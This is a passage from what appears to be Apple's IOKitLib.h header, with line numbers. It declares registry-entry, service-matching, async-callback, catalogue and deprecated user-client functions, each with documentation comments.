io_registry_entry_t entry, 1099 | uint64_t * entryID ); 1100 | 1101 | /*! @function IORegistryEntryCreateCFProperties 1102 | @abstract Create a CF dictionary representation of a registry entry's property table. 1103 | @discussion This function creates an instantaneous snapshot of a registry entry's property table, creating a CFDictionary analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. 1104 | @param entry The registry entry handle whose property table to copy. 1105 | @param properties A CFDictionary is created and returned the caller on success. The caller should release with CFRelease. 1106 | @param allocator The CF allocator to use when creating the CF containers. 1107 | @param options No options are currently defined. 1108 | @result A kern_return_t error code. */ 1109 | 1110 | kern_return_t 1111 | IORegistryEntryCreateCFProperties( 1112 | io_registry_entry_t entry, 1113 | CFMutableDictionaryRef * properties, 1114 | CFAllocatorRef allocator, 1115 | IOOptionBits options ); 1116 | 1117 | /*! @function IORegistryEntryCreateCFProperty 1118 | @abstract Create a CF representation of a registry entry's property. 1119 | @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. 1120 | @param entry The registry entry handle whose property to copy. 1121 | @param key A CFString specifying the property name. 1122 | @param allocator The CF allocator to use when creating the CF container. 1123 | @param options No options are currently defined. 1124 | @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */ 1125 | 1126 | CFTypeRef 1127 | IORegistryEntryCreateCFProperty( 1128 | io_registry_entry_t entry, 1129 | CFStringRef key, 1130 | CFAllocatorRef allocator, 1131 | IOOptionBits options ); 1132 | 1133 | /*! @function IORegistryEntrySearchCFProperty 1134 | @abstract Create a CF representation of a registry entry's property. 1135 | @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. 1136 | This function will search for a property, starting first with specified registry entry's property table, then iterating recusively through either the parent registry entries or the child registry entries of this entry. Once the first occurrence is found, it will lookup and return the value of the property, using the same semantics as IORegistryEntryCreateCFProperty. The iteration keeps track of entries that have been recursed into previously to avoid loops. 1137 | @param entry The registry entry at which to start the search. 1138 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1139 | @param key A CFString specifying the property name. 1140 | @param allocator The CF allocator to use when creating the CF container. 1141 | @param options kIORegistryIterateRecursively may be set to recurse automatically into the registry hierarchy. Without this option, this method degenerates into the standard IORegistryEntryCreateCFProperty() call. kIORegistryIterateParents may be set to iterate the parents of the entry, in place of the children. 1142 | @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */ 1143 | 1144 | CFTypeRef 1145 | IORegistryEntrySearchCFProperty( 1146 | io_registry_entry_t entry, 1147 | const io_name_t plane, 1148 | CFStringRef key, 1149 | CFAllocatorRef allocator, 1150 | IOOptionBits options ) CF_RETURNS_RETAINED; 1151 | 1152 | /* @function IORegistryEntryGetProperty - deprecated, 1153 | use IORegistryEntryCreateCFProperty */ 1154 | 1155 | kern_return_t 1156 | IORegistryEntryGetProperty( 1157 | io_registry_entry_t entry, 1158 | const io_name_t propertyName, 1159 | io_struct_inband_t buffer, 1160 | uint32_t * size ); 1161 | 1162 | /*! @function IORegistryEntrySetCFProperties 1163 | @abstract Set CF container based properties in a registry entry. 1164 | @discussion This is a generic method to pass a CF container of properties to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperties for connection based property setting. The properties are interpreted by the object. 1165 | @param entry The registry entry whose properties to set. 1166 | @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects. 1167 | @result A kern_return_t error code returned by the object. */ 1168 | 1169 | kern_return_t 1170 | IORegistryEntrySetCFProperties( 1171 | io_registry_entry_t entry, 1172 | CFTypeRef properties ); 1173 | 1174 | /*! @function IORegistryEntrySetCFProperty 1175 | @abstract Set a CF container based property in a registry entry. 1176 | @discussion This is a generic method to pass a CF container as a property to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperty for connection based property setting. The property is interpreted by the object. 1177 | @param entry The registry entry whose property to set. 1178 | @param propertyName The name of the property as a CFString. 1179 | @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects. 1180 | @result A kern_return_t error code returned by the object. */ 1181 | 1182 | kern_return_t 1183 | IORegistryEntrySetCFProperty( 1184 | io_registry_entry_t entry, 1185 | CFStringRef propertyName, 1186 | CFTypeRef property ); 1187 | 1188 | /*! @function IORegistryEntryGetChildIterator 1189 | @abstract Returns an iterator over an registry entry's child entries in a plane. 1190 | @discussion This method creates an iterator which will return each of a registry entry's child entries in a specified plane. 1191 | @param entry The registry entry whose children to iterate over. 1192 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1193 | @param iterator The created iterator over the children of the entry, on success. The iterator must be released when the iteration is finished. 1194 | @result A kern_return_t error code. */ 1195 | 1196 | kern_return_t 1197 | IORegistryEntryGetChildIterator( 1198 | io_registry_entry_t entry, 1199 | const io_name_t plane, 1200 | io_iterator_t * iterator ); 1201 | 1202 | /*! @function IORegistryEntryGetChildEntry 1203 | @abstract Returns the first child of a registry entry in a plane. 1204 | @discussion This function will return the child which first attached to a registry entry in a plane. 1205 | @param entry The registry entry whose child to look up. 1206 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1207 | @param child The first child of the registry entry, on success. The child must be released by the caller. 1208 | @result A kern_return_t error code. */ 1209 | 1210 | kern_return_t 1211 | IORegistryEntryGetChildEntry( 1212 | io_registry_entry_t entry, 1213 | const io_name_t plane, 1214 | io_registry_entry_t * child ); 1215 | 1216 | /*! @function IORegistryEntryGetParentIterator 1217 | @abstract Returns an iterator over an registry entry's parent entries in a plane. 1218 | @discussion This method creates an iterator which will return each of a registry entry's parent entries in a specified plane. 1219 | @param entry The registry entry whose parents to iterate over. 1220 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1221 | @param iterator The created iterator over the parents of the entry, on success. The iterator must be released when the iteration is finished. 1222 | @result A kern_return_t error. */ 1223 | 1224 | kern_return_t 1225 | IORegistryEntryGetParentIterator( 1226 | io_registry_entry_t entry, 1227 | const io_name_t plane, 1228 | io_iterator_t * iterator ); 1229 | 1230 | /*! @function IORegistryEntryGetParentEntry 1231 | @abstract Returns the first parent of a registry entry in a plane. 1232 | @discussion This function will return the parent to which the registry entry was first attached in a plane. 1233 | @param entry The registry entry whose parent to look up. 1234 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1235 | @param parent The first parent of the registry entry, on success. The parent must be released by the caller. 1236 | @result A kern_return_t error code. */ 1237 | 1238 | kern_return_t 1239 | IORegistryEntryGetParentEntry( 1240 | io_registry_entry_t entry, 1241 | const io_name_t plane, 1242 | io_registry_entry_t * parent ); 1243 | 1244 | /*! @function IORegistryEntryInPlane 1245 | @abstract Determines if the registry entry is attached in a plane. 1246 | @discussion This method determines if the entry is attached in a plane to any other entry. 1247 | @param entry The registry entry. 1248 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1249 | @result If the entry has a parent in the plane, true is returned, otherwise false is returned. */ 1250 | 1251 | boolean_t 1252 | IORegistryEntryInPlane( 1253 | io_registry_entry_t entry, 1254 | const io_name_t plane ); 1255 | 1256 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 1257 | 1258 | /* 1259 | * Matching dictionary creation helpers 1260 | */ 1261 | 1262 | /*! @function IOServiceMatching 1263 | @abstract Create a matching dictionary that specifies an IOService class match. 1264 | @discussion A very common matching criteria for IOService is based on its class. IOServiceMatching will create a matching dictionary that specifies any IOService of a class, or its subclasses. The class is specified by C-string name. 1265 | @param name The class name, as a const C-string. Class matching is successful on IOService's of this class or any subclass. 1266 | @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */ 1267 | 1268 | CFMutableDictionaryRef 1269 | IOServiceMatching( 1270 | const char * name ) CF_RETURNS_RETAINED; 1271 | 1272 | /*! @function IOServiceNameMatching 1273 | @abstract Create a matching dictionary that specifies an IOService name match. 1274 | @discussion A common matching criteria for IOService is based on its name. IOServiceNameMatching will create a matching dictionary that specifies an IOService with a given name. Some IOServices created from the device tree will perform name matching on the standard compatible, name, model properties. 1275 | @param name The IOService name, as a const C-string. 1276 | @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */ 1277 | 1278 | CFMutableDictionaryRef 1279 | IOServiceNameMatching( 1280 | const char * name ) CF_RETURNS_RETAINED; 1281 | 1282 | /*! @function IOBSDNameMatching 1283 | @abstract Create a matching dictionary that specifies an IOService match based on BSD device name. 1284 | @discussion IOServices that represent BSD devices have an associated BSD name. This function creates a matching dictionary that will match IOService's with a given BSD name. 1285 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 1286 | @param options No options are currently defined. 1287 | @param bsdName The BSD name, as a const char *. 1288 | @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */ 1289 | 1290 | CFMutableDictionaryRef 1291 | IOBSDNameMatching( 1292 | mach_port_t masterPort, 1293 | uint32_t options, 1294 | const char * bsdName ) CF_RETURNS_RETAINED; 1295 | 1296 | CFMutableDictionaryRef 1297 | IOOpenFirmwarePathMatching( 1298 | mach_port_t masterPort, 1299 | uint32_t options, 1300 | const char * path ) DEPRECATED_ATTRIBUTE; 1301 | 1302 | /*! @function IORegistryEntryIDMatching 1303 | @abstract Create a matching dictionary that specifies an IOService match based on a registry entry ID. 1304 | @discussion This function creates a matching dictionary that will match a registered, active IOService found with the given registry entry ID. The entry ID for a registry entry is returned by IORegistryEntryGetRegistryEntryID(). 1305 | @param entryID The registry entry ID to be found. 1306 | @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */ 1307 | 1308 | CFMutableDictionaryRef 1309 | IORegistryEntryIDMatching( 1310 | uint64_t entryID ) CF_RETURNS_RETAINED; 1311 | 1312 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 1313 | 1314 | kern_return_t 1315 | IOServiceOFPathToBSDName(mach_port_t masterPort, 1316 | const io_name_t openFirmwarePath, 1317 | io_name_t bsdName) DEPRECATED_ATTRIBUTE; 1318 | 1319 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 1320 | 1321 | /*! @typedef IOAsyncCallback0 1322 | @abstract standard callback function for asynchronous I/O requests with 1323 | no extra arguments beyond a refcon and result code. 1324 | @param refcon The refcon passed into the original I/O request 1325 | @param result The result of the I/O operation 1326 | */ 1327 | typedef void (*IOAsyncCallback0)(void *refcon, IOReturn result); 1328 | 1329 | /*! @typedef IOAsyncCallback1 1330 | @abstract standard callback function for asynchronous I/O requests with 1331 | one extra argument beyond a refcon and result code. 1332 | This is often a count of the number of bytes transferred 1333 | @param refcon The refcon passed into the original I/O request 1334 | @param result The result of the I/O operation 1335 | @param arg0 Extra argument 1336 | */ 1337 | typedef void (*IOAsyncCallback1)(void *refcon, IOReturn result, void *arg0); 1338 | 1339 | /*! @typedef IOAsyncCallback2 1340 | @abstract standard callback function for asynchronous I/O requests with 1341 | two extra arguments beyond a refcon and result code. 1342 | @param refcon The refcon passed into the original I/O request 1343 | @param result The result of the I/O operation 1344 | @param arg0 Extra argument 1345 | @param arg1 Extra argument 1346 | */ 1347 | typedef void (*IOAsyncCallback2)(void *refcon, IOReturn result, void *arg0, void *arg1); 1348 | 1349 | /*! @typedef IOAsyncCallback 1350 | @abstract standard callback function for asynchronous I/O requests with 1351 | lots of extra arguments beyond a refcon and result code. 1352 | @param refcon The refcon passed into the original I/O request 1353 | @param result The result of the I/O operation 1354 | @param args Array of extra arguments 1355 | @param numArgs Number of extra arguments 1356 | */ 1357 | typedef void (*IOAsyncCallback)(void *refcon, IOReturn result, void **args, 1358 | uint32_t numArgs); 1359 | 1360 | 1361 | /* Internal use */ 1362 | 1363 | kern_return_t 1364 | OSGetNotificationFromMessage( 1365 | mach_msg_header_t * msg, 1366 | uint32_t index, 1367 | uint32_t * type, 1368 | uintptr_t * reference, 1369 | void ** content, 1370 | vm_size_t * size ); 1371 | 1372 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 1373 | 1374 | /* Internal use */ 1375 | 1376 | kern_return_t 1377 | IOCatalogueSendData( 1378 | mach_port_t masterPort, 1379 | uint32_t flag, 1380 | const char *buffer, 1381 | uint32_t size ); 1382 | 1383 | kern_return_t 1384 | IOCatalogueTerminate( 1385 | mach_port_t masterPort, 1386 | uint32_t flag, 1387 | io_name_t description ); 1388 | 1389 | kern_return_t 1390 | IOCatalogueGetData( 1391 | mach_port_t masterPort, 1392 | uint32_t flag, 1393 | char **buffer, 1394 | uint32_t *size ); 1395 | 1396 | kern_return_t 1397 | IOCatalogueModuleLoaded( 1398 | mach_port_t masterPort, 1399 | io_name_t name ); 1400 | 1401 | /* Use IOCatalogueSendData(), with kIOCatalogResetDrivers, to replace catalogue 1402 | * rather than emptying it. Doing so keeps instance counts down by uniquing 1403 | * existing personalities. 1404 | */ 1405 | kern_return_t 1406 | IOCatalogueReset( 1407 | mach_port_t masterPort, 1408 | uint32_t flag ); 1409 | 1410 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 1411 | 1412 | // obsolete API 1413 | 1414 | #if !defined(__LP64__) 1415 | 1416 | // for Power Mgt 1417 | 1418 | typedef struct IOObject IOObject; 1419 | 1420 | // for MacOS.app 1421 | 1422 | kern_return_t 1423 | IORegistryDisposeEnumerator( 1424 | io_enumerator_t enumerator ) DEPRECATED_ATTRIBUTE; 1425 | 1426 | kern_return_t 1427 | IOMapMemory( 1428 | io_connect_t connect, 1429 | uint32_t memoryType, 1430 | task_port_t intoTask, 1431 | vm_address_t * atAddress, 1432 | vm_size_t * ofSize, 1433 | uint32_t flags ) DEPRECATED_ATTRIBUTE; 1434 | 1435 | // for CGS 1436 | 1437 | kern_return_t 1438 | IOCompatibiltyNumber( 1439 | mach_port_t connect, 1440 | uint32_t * objectNumber ) DEPRECATED_ATTRIBUTE; 1441 | 1442 | // Traditional IOUserClient transport routines 1443 | kern_return_t 1444 | IOConnectMethodScalarIScalarO( 1445 | io_connect_t connect, 1446 | uint32_t index, 1447 | IOItemCount scalarInputCount, 1448 | IOItemCount scalarOutputCount, 1449 | ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5; 1450 | 1451 | kern_return_t 1452 | IOConnectMethodScalarIStructureO( 1453 | io_connect_t connect, 1454 | uint32_t index, 1455 | IOItemCount scalarInputCount, 1456 | IOByteCount * structureSize, 1457 | ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5; 1458 | 1459 | kern_return_t 1460 | IOConnectMethodScalarIStructureI( 1461 | io_connect_t connect, 1462 | uint32_t index, 1463 | IOItemCount scalarInputCount, 1464 | IOByteCount structureSize, 1465 | ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5; 1466 | 1467 | kern_return_t 1468 | IOConnectMethodStructureIStructureO( 1469 | io_connect_t connect, 1470 | uint32_t index, 1471 | IOItemCount structureInputSize, 1472 | IOByteCount * structureOutputSize, 1473 | void * inputStructure, 1474 | void * ouputStructure ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5; 1475 | 1476 | // Compatability with earlier Mig interface routines 1477 | #if IOCONNECT_NO_32B_METHODS 1478 | 1479 | kern_return_t 1480 | io_connect_map_memory( 1481 | io_connect_t connect, 1482 | uint32_t memoryType, 1483 | task_port_t intoTask, 1484 | vm_address_t *atAddress, 1485 | vm_size_t *ofSize, 1486 | IOOptionBits options) DEPRECATED_ATTRIBUTE; 1487 | 1488 | kern_return_t 1489 | io_connect_unmap_memory( 1490 | io_connect_t connect, 1491 | uint32_t memoryType, 1492 | task_port_t fromTask, 1493 | vm_address_t atAddress) DEPRECATED_ATTRIBUTE; 1494 | 1495 | kern_return_t 1496 | io_connect_method_scalarI_scalarO( 1497 | mach_port_t connection, 1498 | int selector, 1499 | io_scalar_inband_t input, 1500 | mach_msg_type_number_t inputCnt, 1501 | io_scalar_inband_t output, 1502 | mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE; 1503 | 1504 | kern_return_t 1505 | io_connect_method_scalarI_structureO( 1506 | mach_port_t connection, 1507 | int selector, 1508 | io_scalar_inband_t input, 1509 | mach_msg_type_number_t inputCnt, 1510 | io_struct_inband_t output, 1511 | mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE; 1512 | 1513 | kern_return_t 1514 | io_connect_method_scalarI_structureI( 1515 | mach_port_t connection, 1516 | int selector, 1517 | io_scalar_inband_t input, 1518 | mach_msg_type_number_t inputCnt, 1519 | io_struct_inband_t inputStruct, 1520 | mach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE; 1521 | 1522 | kern_return_t 1523 | io_connect_method_structureI_structureO( 1524 | mach_port_t connection, 1525 | int selector, 1526 | io_struct_inband_t input, 1527 | mach_msg_type_number_t inputCnt, 1528 | io_struct_inband_t output, 1529 | mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE; 1530 | 1531 | kern_return_t 1532 | io_async_method_scalarI_scalarO( 1533 | mach_port_t connection, 1534 | mach_port_t wake_port, 1535 | io_async_ref_t reference, 1536 | mach_msg_type_number_t referenceCnt, 1537 | int selector, 1538 | io_scalar_inband_t input, 1539 | mach_msg_type_number_t inputCnt, 1540 | io_scalar_inband_t output, 1541 | mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE; 1542 | 1543 | kern_return_t 1544 | io_async_method_scalarI_structureO( 1545 | mach_port_t connection, 1546 | mach_port_t wake_port, 1547 | io_async_ref_t reference, 1548 | mach_msg_type_number_t referenceCnt, 1549 | int selector, 1550 | io_scalar_inband_t input, 1551 | mach_msg_type_number_t inputCnt, 1552 | io_struct_inband_t output, 1553 | mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE; 1554 | 1555 | kern_return_t 1556 | io_async_method_scalarI_structureI( 1557 | mach_port_t connection, 1558 | mach_port_t wake_port, 1559 | io_async_ref_t reference, 1560 | mach_msg_type_number_t referenceCnt, 1561 | int selector, 1562 | io_scalar_inband_t input, 1563 | mach_msg_type_number_t inputCnt, 1564 | io_struct_inband_t inputStruct, 1565 | mach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE; 1566 | 1567 | kern_return_t 1568 | io_async_method_structureI_structureO( 1569 | mach_port_t connection, 1570 | mach_port_t wake_port, 1571 | io_async_ref_t reference, 1572 | mach_msg_type_number_t referenceCnt, 1573 | int selector, 1574 | io_struct_inband_t input, 1575 | mach_msg_type_number_t inputCnt, 1576 | io_struct_inband_t output, 1577 | mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE; 1578 | #endif // IOCONNECT_NO_32B_METHODS 1579 | 1580 | #endif /* defined(__LP64__) */ 1581 | 1582 | __END_DECLS 1583 | 1584 | #endif /* ! _IOKIT_IOKITLIB_H */ 1585 | --------------------------------------------------------------------------------